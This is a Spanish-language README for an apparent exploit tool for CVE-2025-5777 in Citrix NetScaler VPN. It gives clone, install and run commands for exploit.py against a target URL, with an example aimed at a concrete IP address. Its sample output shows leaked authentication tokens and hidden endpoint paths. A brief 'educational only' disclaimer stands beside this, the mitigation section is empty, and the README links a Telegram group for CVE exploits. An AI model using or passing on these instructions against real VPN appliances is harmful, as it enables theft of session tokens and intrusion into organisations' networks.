
Herramienta de explotación basada en async para CVE-2025-5777 que detecta y extrae tokens de autenticación filtrados, IPs internas y rutas de endpoints ocultos de endpoints VPN de Citrix NetScaler vulnerables.
Una herramienta educativa potente diseñada para demostrar y analizar la vulnerabilidad CVE-2025-5777 que afecta a Citrix NetScaler VPN.
Este proyecto es parte de la iniciativa GO-TO CVE.
⚠️ Solo con fines educativos. NO lo uses en sistemas que no poseas o para los que no tengas permiso explícito de prueba.
Este script intenta detectar y extraer tokens internos sensibles, IPs internas y rutas de endpoints ocultos expuestos por endpoints VPN de Citrix vulnerables.
Está diseñado para ayudar a estudiantes, investigadores de seguridad y red teamers a comprender mejor cómo se descubren y analizan los CVE del mundo real.
git clone https://github.com/soltanali0/CVE-2025-5777-Exploit.git
cd CVE-2025-5777-Exploit
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
Requiere Python 3.8+ Opcional: Puedes usar un entorno virtual
python3 exploit.py https://target-vpn.com
--proxy http://127.0.0.1:8080 para enrutar a través de Burp/SOCKS--silent para suprimir la salida--output result.json para guardar en JSONEjemplo:
python3 exploit.py https://20.237.190.100 --output leaks.json

[!] Leak analysis:
→ Tokens found: ZWZlNjViZDA4NThj...
→ Paths found: /nf/auth/doLogoff.do, /nf/auth/doEPA.do, /Credential
y

Para evitar la explotación de este CVE:
Esta herramienta se publica estrictamente con fines educativos y de investigación legítimos. El desarrollador no se hace responsable de ningún uso indebido o actividad ilegal realizada con este código.
Al usar esta herramienta, aceptas que:
Únete a la comunidad de investigación de filtraciones y exploits de CVE: 👉 https://t.me/GOTOCVE
Desarrollado por Ali Soltani – red teamer y cazador de CVE.
Orgullosamente parte de GO-TO CVE